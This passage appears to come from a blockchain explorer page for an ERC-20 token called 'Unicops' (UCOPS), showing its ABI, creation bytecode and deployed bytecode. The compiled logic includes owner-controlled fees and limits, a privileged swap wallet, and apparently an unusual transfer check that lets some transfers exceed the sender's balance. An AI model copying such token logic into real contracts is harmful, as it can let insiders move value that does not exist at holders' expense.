IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"finalBuyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"finalSellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwapWithAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setTokensToSwapAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a0604052620000126009600a62000528565b6200002190629896806200053f565b6009556009600a62000034919062000528565b620000439062030d406200053f565b600a556009600a62000056919062000528565b620000659062030d406200053f565b600b55620000766009600a62000528565b6200008590620186a06200053f565b600c55600f805461ffff1916905560036010819055601155601460128190556013819055808055601555348015620000bb575f80fd5b5060405180604001604052806007815260200166556e69636f707360c81b8152506040518060400160405280600581526020016455434f505360d81b81525081600390816200010b9190620005f8565b5060046200011a8282620005f8565b50505062000137620001316200020060201b60201c565b62000204565b737a250d5630b4cf539739df2c5dacb4c659f2488d60808190526200015e90600162000255565b600880546001600160a01b0319163390811790915562000181905b600162000255565b600780546001600160a01b03191633908117909155620001a390600162000289565b620001b030600162000289565b620001bf61dead600162000289565b620001ca3362000179565b620001d730600162000255565b620001e661dead600162000255565b620001fa30600954620002f160201b60201c565b620006d6565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6200025f620003b6565b6001600160a01b03919091165f908152601760205260409020805460ff1916911515919091179055565b62000293620003b6565b6001600160a01b0382165f81815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b0382166200034d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060025f828254620003609190620006c0565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6005546001600160a01b03163314620004125760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000344565b565b505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200046d57815f190482111562000451576200045162000419565b808516156200045f57918102915b93841c939080029062000432565b509250929050565b5f82620004855750600162000522565b816200049357505f62000522565b8160018114620004ac5760028114620004b757620004d7565b600191505062000522565b60ff841115620004cb57620004cb62000419565b50506001821b62000522565b5060208310610133831016604e8410600b8410161715620004fc575081810a62000522565b6200050883836200042d565b805f19048211156200051e576200051e62000419565b0290505b92915050565b5f6200053860ff84168362000475565b9392505050565b808202811582820484141762000522576200052262000419565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200058257607f821691505b602082108103620005a157634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000414575f81815260208120601f850160051c81016020861015620005cf5750805b601f850160051c820191505b81811015620005f057828155600101620005db565b505050505050565b81516001600160401b0381111562000614576200061462000559565b6200062c816200062584546200056d565b84620005a7565b602080601f83116001811462000662575f84156200064a5750858301515b5f19600386901b1c1916600185901b178555620005f0565b5f85815260208120601f198616915b82811015620006925788860151825594840194600190910190840162000671565b5085821015620006b057878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b8082018082111562000522576200052262000419565b608051611e20620007275f395f81816103d501528181610ace01528181610b5d01528181610ca401528181610d2501528181610d6b015281816110a901528181611160015261119c0152611e205ff3fe608060405260043610610220575f3560e01c80637571336a1161011e578063c8c8ebe4116100a8578063e6990a901161006d578063e6990a90146105fa578063e6d40d601461060f578063f2fde38b14610624578063f8b45b0514610643578063ffb54a9914610658575f80fd5b8063c8c8ebe414610588578063c9567bf91461059d578063ca703075146105b1578063dd62ed3e146105c6578063e2f45605146105e5575f80fd5b80639a7a23d6116100ee5780639a7a23d6146104ed5780639bbad4101461050c578063a457c2d71461052b578063a9059cbb1461054a578063c024666814610569575f80fd5b80637571336a1461048957806389291a8f146104a85780638da5cb5b146104bc57806395d89b41146104d9575f80fd5b806339509351116101aa578063590f897e1161016f578063590f897e1461040f5780636ddd17131461042457806370a0823114610442578063715018a614610461578063751039fc14610475575f80fd5b8063395093511461034557806340b9a54b146103645780634fbee1931461037957806351bc3c85146103b0578063583e0568146103c4575f80fd5b8063239cd5a5116101f0578063239cd5a5146102bb57806323b872dd146102dc578063311028af146102fb578063313ce5671461031057806332424aa314610331575f80fd5b806306fdde031461022b578063095ea7b3146102555780630c6b67371461028457806318160ddd146102a7575f80fd5b3661022757005b5f80fd5b348015610236575f80fd5b5061023f610671565b60405161024c9190611a81565b60405180910390f35b348015610260575f80fd5b5061027461026f366004611ae0565b610701565b604051901515815260200161024c565b34801561028f575f80fd5b50610299600e5481565b60405190815260200161024c565b3480156102b2575f80fd5b50600254610299565b3480156102c6575f80fd5b506102da6102d5366004611b0a565b61071a565b005b3480156102e7575f80fd5b506102746102f6366004611b21565b61075e565b348015610306575f80fd5b5061029960095481565b34801561031b575f80fd5b5060095b60405160ff909116815260200161024c565b34801561033c575f80fd5b5061031f600981565b348015610350575f80fd5b5061027461035f366004611ae0565b610781565b34801561036f575f80fd5b5061029960125481565b348015610384575f80fd5b50610274610393366004611b5f565b6001600160a01b03165f9081526016602052604090205460ff1690565b3480156103bb575f80fd5b506102da6107a2565b3480156103cf575f80fd5b506103f77f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b03909116815260200161024c565b34801561041a575f80fd5b5061029960135481565b34801561042f575f80fd5b50600f5461027490610100900460ff1681565b34801561044d575f80fd5b5061029961045c366004611b5f565b6107d9565b34801561046c575f80fd5b506102da6107f3565b348015610480575f80fd5b506102da610806565b348015610494575f80fd5b506102da6104a3366004611b87565b610823565b3480156104b3575f80fd5b506102da610855565b3480156104c7575f80fd5b506005546001600160a01b03166103f7565b3480156104e4575f80fd5b5061023f6108d3565b3480156104f8575f80fd5b506102da610507366004611b87565b6108e2565b348015610517575f80fd5b506102da610526366004611b0a565b610970565b348015610536575f80fd5b50610274610545366004611ae0565b610990565b348015610555575f80fd5b50610274610564366004611ae0565b610a0a565b348015610574575f80fd5b506102da610583366004611b87565b610a17565b348015610593575f80fd5b50610299600a5481565b3480156105a8575f80fd5b506102da610a7d565b3480156105bc575f80fd5b50610299600d5481565b3480156105d1575f80fd5b506102996105e0366004611bbe565b610e91565b3480156105f0575f80fd5b50610299600c5481565b348015610605575f80fd5b5061029960115481565b34801561061a575f80fd5b5061029960105481565b34801561062f575f80fd5b506102da61063e366004611b5f565b610ebb565b34801561064e575f80fd5b50610299600b5481565b348015610663575f80fd5b50600f546102749060ff1681565b60606003805461068090611bea565b80601f01602080910402602001604051908101604052809291908181526020018280546106ac90611bea565b80156106f75780601f106106ce576101008083540402835291602001916106f7565b820191905f5260205f20905b8154815290600101906020018083116106da57829003601f168201915b5050505050905090565b5f3361070e818585610f31565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b031614610739575f80fd5b5f610743306107d9565b905080821115610751575f80fd5b61075a82611054565b5050565b5f3361076b85828561121e565b610776858585611296565b506001949350505050565b5f3361070e8185856107938383610e91565b61079d9190611c36565b610f31565b6008546001600160a01b0316336001600160a01b0316146107c1575f80fd5b5f6107cb306107d9565b90506107d681611054565b50565b6001600160a01b03165f9081526020819052604090205490565b6107fb61181f565b6108045f611879565b565b61080e61181f565b5f61081860025490565b600a819055600b5550565b61082b61181f565b6001600160a01b03919091165f908152601760205260409020805460ff1916911515919091179055565b61085d61181f565b5f47116108aa5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02915f818181858888f193505050501580156107d6573d5f803e3d5ffd5b60606004805461068090611bea565b6108ea61181f565b6006546001600160a01b03908116908316036109665760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108a1565b61075a82826118ca565b61097861181f565b61098a81670de0b6b3a7640000611c49565b600c5550565b5f338161099d8286610e91565b9050838110156109fd5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108a1565b6107768286868403610f31565b5f3361070e818585611296565b610a1f61181f565b6001600160a01b0382165f81815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610a8561181f565b600f5460ff1615610acc5760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108a1565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b28573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b4c9190611c60565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610bb7573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610bdb9190611c60565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610c25573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610c499190611c60565b600680546001600160a01b0319166001600160a01b03929092169182179055610c739060016118ca565b600654610c8a906001600160a01b03166001610823565b60065460405163095ea7b360e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000811660048301525f1960248301529091169063095ea7b3906044016020604051808303815f875af1158015610cfa573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d1e9190611c7b565b50610d4c307f0000000000000000000000000000000000000000000000000000000000000000600954610f31565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169163f305d71991479181906370a0823190602401602060405180830381865afa158015610dba573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610dde9190611c96565b5f80610df26005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610e58573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610e7d9190611cad565b5050600f805461ffff191661010117905550565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610ec361181f565b6001600160a01b038116610f285760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108a1565b6107d681611879565b6001600160a01b038316610f935760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108a1565b6001600160a01b038216610ff45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108a1565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6040805160028082526060820183525f9260208301908036833701905050905030815f8151811061108757611087611cd8565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611103573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111279190611c60565b8160018151811061113a5761113a611cd8565b60200260200101906001600160a01b031690816001600160a01b031681525050611185307f000000000000000000000000000000000000000000000000000000000000000084610f31565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac947906111ed9085905f908690733f687f43c3aaa91aad30d255024132c51db3b8ca904290600401611cec565b5f604051808303815f87803b158015611204575f80fd5b505af1158015611216573d5f803e3d5ffd5b505050505050565b5f6112298484610e91565b90505f19811461129057818110156112835760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016108a1565b6112908484848403610f31565b50505050565b6001600160a01b0383166112bc5760405162461bcd60e51b81526004016108a190611d5b565b601454600d54106112ce576010546012555b601554600e54106112e0576011546013555b805f036112f7576112f283835f61191d565b505050565b6005546001600160a01b0384811691161480159061132357506005546001600160a01b03838116911614155b801561133757506001600160a01b03821615155b801561134e57506001600160a01b03821661dead14155b80156113645750600854600160a01b900460ff16155b1561165957600f5460ff166113f5576001600160a01b0383165f9081526016602052604090205460ff16806113b057506001600160a01b0382165f9081526016602052604090205460ff165b6113f55760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016108a1565b6001600160a01b0383165f9081526018602052604090205460ff16801561143457506001600160a01b0382165f9081526017602052604090205460ff16155b1561151c57600a548111156114a95760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016108a1565b600b546114b5836107d9565b6114bf9083611c36565b11156115035760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108a1565b600d8054905f61151283611da0565b9190505550611659565b6001600160a01b0382165f9081526018602052604090205460ff16801561155b57506001600160a01b0383165f9081526017602052604090205460ff16155b156115e057600a548111156115d15760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016108a1565b600e8054905f61151283611da0565b6001600160a01b0382165f9081526017602052604090205460ff1661165957600b5461160b836107d9565b6116159083611c36565b11156116595760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108a1565b5f611663306107d9565b90508015801590819061167d5750600f54610100900460ff165b80156116935750600854600160a01b900460ff16155b80156116b757506001600160a01b0385165f9081526018602052604090205460ff16155b80156116db57506001600160a01b0385165f9081526016602052604090205460ff16155b80156116ff57506001600160a01b0384165f9081526016602052604090205460ff16155b1561172e576008805460ff60a01b1916600160a01b17905561172083611a42565b6008805460ff60a01b191690555b6008546001600160a01b0386165f9081526016602052604090205460ff600160a01b90920482161591168061177a57506001600160a01b0385165f9081526016602052604090205460ff165b1561178257505f5b5f811561180b576001600160a01b0386165f9081526018602052604090205460ff16156117d0576117c960646117c360135488611a6490919063ffffffff16565b90611a76565b90506117ed565b6117ea60646117c360125488611a6490919063ffffffff16565b90505b80156117fe576117fe87308361191d565b6118088186611db8565b94505b61181687878761191d565b50505050505050565b6005546001600160a01b031633146108045760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016108a1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0382165f81815260186020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0383166119435760405162461bcd60e51b81526004016108a190611d5b565b6001600160a01b0383165f90815260208190526040902054818110158061197257506001600160a01b03831630145b6119cd5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016108a1565b8181106119dc578181036119de565b5f5b6001600160a01b038581165f818152602081815260408083209590955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3611290565b5f611a4c306107d9565b90505f815f03611a595750815b50806112f281611054565b5f611a6f8284611c49565b9392505050565b5f611a6f8284611dcb565b5f6020808352835180828501525f5b81811015611aac57858101830151858201604001528201611a90565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107d6575f80fd5b5f8060408385031215611af1575f80fd5b8235611afc81611acc565b946020939093013593505050565b5f60208284031215611b1a575f80fd5b5035919050565b5f805f60608486031215611b33575f80fd5b8335611b3e81611acc565b92506020840135611b4e81611acc565b929592945050506040919091013590565b5f60208284031215611b6f575f80fd5b8135611a6f81611acc565b80151581146107d6575f80fd5b5f8060408385031215611b98575f80fd5b8235611ba381611acc565b91506020830135611bb381611b7a565b809150509250929050565b5f8060408385031215611bcf575f80fd5b8235611bda81611acc565b91506020830135611bb381611acc565b600181811c90821680611bfe57607f821691505b602082108103611c1c57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561071457610714611c22565b808202811582820484141761071457610714611c22565b5f60208284031215611c70575f80fd5b8151611a6f81611acc565b5f60208284031215611c8b575f80fd5b8151611a6f81611b7a565b5f60208284031215611ca6575f80fd5b5051919050565b5f805f60608486031215611cbf575f80fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015611d3a5784516001600160a01b031683529383019391830191600101611d15565b50506001600160a01b03969096166060850152505050608001529392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b5f60018201611db157611db1611c22565b5060010190565b8181038181111561071457610714611c22565b5f82611de557634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220c40ecfed5e4db3e8a9b8a313472b0969804c277b20e03db2cee01d3247d6345864736f6c63430008140033

Deployed Bytecode

0x608060405260043610610220575f3560e01c80637571336a1161011e578063c8c8ebe4116100a8578063e6990a901161006d578063e6990a90146105fa578063e6d40d601461060f578063f2fde38b14610624578063f8b45b0514610643578063ffb54a9914610658575f80fd5b8063c8c8ebe414610588578063c9567bf91461059d578063ca703075146105b1578063dd62ed3e146105c6578063e2f45605146105e5575f80fd5b80639a7a23d6116100ee5780639a7a23d6146104ed5780639bbad4101461050c578063a457c2d71461052b578063a9059cbb1461054a578063c024666814610569575f80fd5b80637571336a1461048957806389291a8f146104a85780638da5cb5b146104bc57806395d89b41146104d9575f80fd5b806339509351116101aa578063590f897e1161016f578063590f897e1461040f5780636ddd17131461042457806370a0823114610442578063715018a614610461578063751039fc14610475575f80fd5b8063395093511461034557806340b9a54b146103645780634fbee1931461037957806351bc3c85146103b0578063583e0568146103c4575f80fd5b8063239cd5a5116101f0578063239cd5a5146102bb57806323b872dd146102dc578063311028af146102fb578063313ce5671461031057806332424aa314610331575f80fd5b806306fdde031461022b578063095ea7b3146102555780630c6b67371461028457806318160ddd146102a7575f80fd5b3661022757005b5f80fd5b348015610236575f80fd5b5061023f610671565b60405161024c9190611a81565b60405180910390f35b348015610260575f80fd5b5061027461026f366004611ae0565b610701565b604051901515815260200161024c565b34801561028f575f80fd5b50610299600e5481565b60405190815260200161024c565b3480156102b2575f80fd5b50600254610299565b3480156102c6575f80fd5b506102da6102d5366004611b0a565b61071a565b005b3480156102e7575f80fd5b506102746102f6366004611b21565b61075e565b348015610306575f80fd5b5061029960095481565b34801561031b575f80fd5b5060095b60405160ff909116815260200161024c565b34801561033c575f80fd5b5061031f600981565b348015610350575f80fd5b5061027461035f366004611ae0565b610781565b34801561036f575f80fd5b5061029960125481565b348015610384575f80fd5b50610274610393366004611b5f565b6001600160a01b03165f9081526016602052604090205460ff1690565b3480156103bb575f80fd5b506102da6107a2565b3480156103cf575f80fd5b506103f77f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b03909116815260200161024c565b34801561041a575f80fd5b5061029960135481565b34801561042f575f80fd5b50600f5461027490610100900460ff1681565b34801561044d575f80fd5b5061029961045c366004611b5f565b6107d9565b34801561046c575f80fd5b506102da6107f3565b348015610480575f80fd5b506102da610806565b348015610494575f80fd5b506102da6104a3366004611b87565b610823565b3480156104b3575f80fd5b506102da610855565b3480156104c7575f80fd5b506005546001600160a01b03166103f7565b3480156104e4575f80fd5b5061023f6108d3565b3480156104f8575f80fd5b506102da610507366004611b87565b6108e2565b348015610517575f80fd5b506102da610526366004611b0a565b610970565b348015610536575f80fd5b50610274610545366004611ae0565b610990565b348015610555575f80fd5b50610274610564366004611ae0565b610a0a565b348015610574575f80fd5b506102da610583366004611b87565b610a17565b348015610593575f80fd5b50610299600a5481565b3480156105a8575f80fd5b506102da610a7d565b3480156105bc575f80fd5b50610299600d5481565b3480156105d1575f80fd5b506102996105e0366004611bbe565b610e91565b3480156105f0575f80fd5b50610299600c5481565b348015610605575f80fd5b5061029960115481565b34801561061a575f80fd5b5061029960105481565b34801561062f575f80fd5b506102da61063e366004611b5f565b610ebb565b34801561064e575f80fd5b50610299600b5481565b348015610663575f80fd5b50600f546102749060ff1681565b60606003805461068090611bea565b80601f01602080910402602001604051908101604052809291908181526020018280546106ac90611bea565b80156106f75780601f106106ce576101008083540402835291602001916106f7565b820191905f5260205f20905b8154815290600101906020018083116106da57829003601f168201915b5050505050905090565b5f3361070e818585610f31565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b031614610739575f80fd5b5f610743306107d9565b905080821115610751575f80fd5b61075a82611054565b5050565b5f3361076b85828561121e565b610776858585611296565b506001949350505050565b5f3361070e8185856107938383610e91565b61079d9190611c36565b610f31565b6008546001600160a01b0316336001600160a01b0316146107c1575f80fd5b5f6107cb306107d9565b90506107d681611054565b50565b6001600160a01b03165f9081526020819052604090205490565b6107fb61181f565b6108045f611879565b565b61080e61181f565b5f61081860025490565b600a819055600b5550565b61082b61181f565b6001600160a01b03919091165f908152601760205260409020805460ff1916911515919091179055565b61085d61181f565b5f47116108aa5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02915f818181858888f193505050501580156107d6573d5f803e3d5ffd5b60606004805461068090611bea565b6108ea61181f565b6006546001600160a01b03908116908316036109665760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108a1565b61075a82826118ca565b61097861181f565b61098a81670de0b6b3a7640000611c49565b600c5550565b5f338161099d8286610e91565b9050838110156109fd5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108a1565b6107768286868403610f31565b5f3361070e818585611296565b610a1f61181f565b6001600160a01b0382165f81815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610a8561181f565b600f5460ff1615610acc5760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108a1565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b28573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b4c9190611c60565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610bb7573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610bdb9190611c60565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610c25573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610c499190611c60565b600680546001600160a01b0319166001600160a01b03929092169182179055610c739060016118ca565b600654610c8a906001600160a01b03166001610823565b60065460405163095ea7b360e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d811660048301525f1960248301529091169063095ea7b3906044016020604051808303815f875af1158015610cfa573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d1e9190611c7b565b50610d4c307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600954610f31565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169163f305d71991479181906370a0823190602401602060405180830381865afa158015610dba573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610dde9190611c96565b5f80610df26005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610e58573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610e7d9190611cad565b5050600f805461ffff191661010117905550565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610ec361181f565b6001600160a01b038116610f285760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108a1565b6107d681611879565b6001600160a01b038316610f935760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108a1565b6001600160a01b038216610f